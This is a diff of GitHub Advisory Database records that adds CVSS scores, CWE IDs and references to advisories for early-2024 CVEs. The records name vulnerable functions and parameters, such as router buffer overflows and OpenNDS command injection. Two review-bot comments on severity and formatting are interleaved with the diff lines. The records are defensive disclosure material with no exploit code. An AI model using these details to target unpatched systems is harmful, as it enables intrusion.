+++ b/advisories/unreviewed/2024/01/GHSA-8pp2-pfr8-5hm5/GHSA-8pp2-pfr8-5hm5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8pp2-pfr8-5hm5", - "modified": "2024-01-25T06:30:31Z", + "modified": "2024-02-01T18:31:08Z", "published": "2024-01-25T06:30:31Z", "aliases": [ "CVE-2024-23985" ], "details": "EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T05:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json b/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json index 07e45073ad985..e476e27407e61 100644 --- a/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json +++ b/advisories/unreviewed/2024/01/GHSA-8qcc-g56h-g74w/GHSA-8qcc-g56h-g74w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8qcc-g56h-g74w", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48127" ], "details": "An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:56Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json b/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json new file mode 100644 index 0000000000000..4e4899f9efe3b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8qq6-2q43-h362/GHSA-8qq6-2q43-h362.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qq6-2q43-h362", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1011" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1011" + }, + { + "type": "WEB", + "url": "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252280" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json b/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json index 2288b5f24174d..55c6a4d9955ed 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json +++ b/advisories/unreviewed/2024/01/GHSA-8r5c-mgwc-qg49/GHSA-8r5c-mgwc-qg49.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8r5c-mgwc-qg49", - "modified": "2024-01-24T09:30:25Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T09:30:25Z", "aliases": [ "CVE-2023-51711" ], "details": "An issue was discovered in Regify Regipay Client for Windows version 4.5.1.0 allows DLL hijacking: a user can trigger the execution of arbitrary code every time the product is executed.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-427" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T07:15:47Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json b/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json index fd487da3fdac1..1ec2cbb8f4ecd 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json +++ b/advisories/unreviewed/2024/01/GHSA-8r62-6w8q-xrq2/GHSA-8r62-6w8q-xrq2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8r62-6w8q-xrq2", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0805" ], "details": "Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json b/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json index 2846e43ae9c4c..24b62d3e402bb 100644 --- a/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json +++ b/advisories/unreviewed/2024/01/GHSA-8r89-2849-x8p3/GHSA-8r89-2849-x8p3.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json b/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json new file mode 100644 index 0000000000000..64f632d3746db --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8vhj-m4qr-2chr/GHSA-8vhj-m4qr-2chr.json 
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8vhj-m4qr-2chr",
+ "modified": "2024-01-29T15:30:30Z",
+ "published": "2024-01-29T15:30:30Z",
+ "aliases": [
+ "CVE-2024-1004"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in Totolink N200RE 9.3.5u.6139_B20201216. This affects the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1004"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-loginAuth-cbde48da404049328cb698394b6c0641?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252273"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252273"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json b/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json
index a1974633c1023..0c17f6c807c43 100644
--- a/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json
+++ b/advisories/unreviewed/2024/01/GHSA-8xmj-gvcg-7vcw/GHSA-8xmj-gvcg-7vcw.json
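Review bot: The CVSS vector added for CVE-2024-1004 carries `PR:H`, yet the details name the `loginAuth` handler of /cgi-bin/cstecgi.cgi, which by its name is presumably reachable before authentication; if that is so, the privileges-required metric and the derived `"severity": "HIGH"` understate the issue. Since this record mirrors the upstream (VulDB/NVD) score, the mismatch is worth confirming against the source before the advisory is used for prioritisation, rather than edited locally. The sibling TOTOLINK record GHSA-9h4j-w5f8-xjpc further down carries the same `PR:H` vector, though its `setLanguageCfg` function gives no comparable hint either way.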
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8xmj-gvcg-7vcw",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T18:31:48Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52329"
 ],
 "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52326.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json b/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json
new file mode 100644
index 0000000000000..72f6ff01b26f4
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9283-2mpg-73m4/GHSA-9283-2mpg-73m4.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9283-2mpg-73m4",
+ "modified": "2024-01-29T03:30:18Z",
+ "published": "2024-01-29T03:30:18Z",
+ "aliases": [
+ "CVE-2024-0990"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in Tenda i6 1.0.0.9(3857). This affects the function formSetAutoPing of the file /goform/setAutoPing of the component httpd. The manipulation of the argument ping1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0990"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetAutoPing-2e009d81eb7e45438565d5ba6794f4e3?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252255"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252255"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121",
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json b/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json
index 450b4e39668d3..9aa6d0c8f9924 100644
--- a/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json
+++ b/advisories/unreviewed/2024/01/GHSA-93gv-w5cx-phvx/GHSA-93gv-w5cx-phvx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-93gv-w5cx-phvx",
- "modified": "2024-01-23T15:30:57Z",
+ "modified": "2024-01-30T18:30:19Z",
 "published": "2024-01-23T15:30:57Z",
 "aliases": [
 "CVE-2024-0745"
 ],
 "details": "The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json b/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json
index 141ea85efbbce..dc26041873a2f 100644
--- a/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json
+++ b/advisories/unreviewed/2024/01/GHSA-93h3-xr58-xwf6/GHSA-93h3-xr58-xwf6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-93h3-xr58-xwf6",
- "modified": "2024-01-26T06:30:29Z",
+ "modified": "2024-02-02T18:30:29Z",
 "published": "2024-01-26T06:30:29Z",
 "aliases": [
 "CVE-2023-38317"
 ],
 "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -37,9 +40,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-78"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-26T05:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json b/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json
index 5988636f9dd1b..9cb419140ea19 100644
--- a/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json
+++ b/advisories/unreviewed/2024/01/GHSA-93px-8x98-j7p2/GHSA-93px-8x98-j7p2.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-93px-8x98-j7p2",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-30T15:30:22Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2024-23222"
 ],
 "details": "A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -46,6 +49,10 @@
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT214063"
 },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Feb/6"
+ },
 {
 "type": "WEB",
 "url": "http://seclists.org/fulldisclosure/2024/Jan/27"
@@ -73,13 +80,17 @@
 {
 "type": "WEB",
 "url": "http://seclists.org/fulldisclosure/2024/Jan/40"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-843"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json b/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json
index 4fcd00a526846..008136de4d213 100644
--- a/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json
+++ b/advisories/unreviewed/2024/01/GHSA-93v2-7c6x-23m2/GHSA-93v2-7c6x-23m2.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-120"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json b/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json
new file mode 100644
index 0000000000000..67c8b4af8f22d
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9523-w7r4-2c3x/GHSA-9523-w7r4-2c3x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9523-w7r4-2c3x",
+ "modified": "2024-01-31T18:31:26Z",
+ "published": "2024-01-31T18:31:26Z",
+ "aliases": [
+ "CVE-2024-22160"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bradley B. Dalina Image Tag Manager allows Reflected XSS.This issue affects Image Tag Manager: from n/a through 1.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22160"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json b/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json
index c793e96bc018a..1343145f75797 100644
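Review bot: The `details` string of the new GHSA-9523-w7r4-2c3x record ends in `\n\n` and contains `Reflected XSS.This issue` with the space after the period missing, both carried through verbatim from the upstream Patchstack text. The same trailing `\n\n` appears in GHSA-9gf5-vf62-9578 further down, so it looks systematic rather than a one-off. Trimming trailing whitespace from `details` at import time would keep rendered advisories and any text-equality checks consistent across sources; the upstream wording itself is better left as the source gave it than silently rewritten here.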
--- a/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json
+++ b/advisories/unreviewed/2024/01/GHSA-95jr-7vvp-xrg6/GHSA-95jr-7vvp-xrg6.json
@@ -25,6 +25,10 @@
 "type": "WEB",
 "url": "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.251544"
diff --git a/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json b/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json
index 555a0cf4b9116..a2549f220db47 100644
--- a/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json
+++ b/advisories/unreviewed/2024/01/GHSA-969g-frgv-hccv/GHSA-969g-frgv-hccv.json
@@ -25,6 +25,10 @@
 "type": "WEB",
 "url": "https://advisory.abay.sh/cve-2023-6524"
 },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3015598%40mappress-google-maps-for-wordpress%2Ftrunk&old=3001436%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail="
+ },
 {
 "type": "WEB",
 "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3001436%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.13&new=3015598%40mappress-google-maps-for-wordpress%2Ftags%2F2.88.14#file31"
diff --git a/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json b/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json
index 40f54f9064d58..7a4a237d44add 100644
--- a/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json
+++ b/advisories/unreviewed/2024/01/GHSA-96c9-2v9p-9chw/GHSA-96c9-2v9p-9chw.json
@@ -28,6 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-284",
 "CWE-88"
 ],
 "severity": "MODERATE",
diff --git a/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json b/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json
index 964ce3ceebbd9..44bae32586875 100644
--- a/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json
+++ b/advisories/unreviewed/2024/01/GHSA-96gj-xmph-8xrx/GHSA-96gj-xmph-8xrx.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20981"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0003/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json b/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json
index 160dbc9b1d28c..7029cf84172de 100644
--- a/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json
+++ b/advisories/unreviewed/2024/01/GHSA-9827-m264-fw2m/GHSA-9827-m264-fw2m.json
@@ -32,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-476"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json b/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json
index fa245efaf9716..8e161540691fb 100644
--- a/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json
+++ b/advisories/unreviewed/2024/01/GHSA-98h2-7j4h-7xc5/GHSA-98h2-7j4h-7xc5.json
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-20"
+ "CWE-20",
+ "CWE-798"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json b/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json
index 1b005f56ca8a4..c8488a9b57d22 100644
--- a/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json
+++ b/advisories/unreviewed/2024/01/GHSA-98qr-f62q-46cx/GHSA-98qr-f62q-46cx.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20922"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0002/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json b/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json
index 77655a5676065..995363e34c51e 100644
--- a/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json
+++ b/advisories/unreviewed/2024/01/GHSA-9933-5g23-6jq2/GHSA-9933-5g23-6jq2.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9933-5g23-6jq2",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T21:30:27Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52092"
 ],
 "details": "A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-59"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json b/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json
index 00c9a8e11e62e..4e9a3e4aa9dc1 100644
--- a/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json
+++ b/advisories/unreviewed/2024/01/GHSA-9954-329g-42vc/GHSA-9954-329g-42vc.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9954-329g-42vc",
- "modified": "2024-01-12T18:30:20Z",
+ "modified": "2024-02-06T12:30:30Z",
 "published": "2024-01-08T21:30:34Z",
 "aliases": [
 "CVE-2023-51408"
diff --git a/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json b/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json
index 15a6675ed5c6b..0078cb86eaa5c 100644
--- a/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json
+++ b/advisories/unreviewed/2024/01/GHSA-9cp8-26q6-h5f9/GHSA-9cp8-26q6-h5f9.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9cp8-26q6-h5f9",
- "modified": "2024-01-26T06:30:29Z",
+ "modified": "2024-02-02T18:30:29Z",
 "published": "2024-01-26T06:30:29Z",
 "aliases": [
 "CVE-2023-38318"
 ],
 "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -37,9 +40,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-78"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
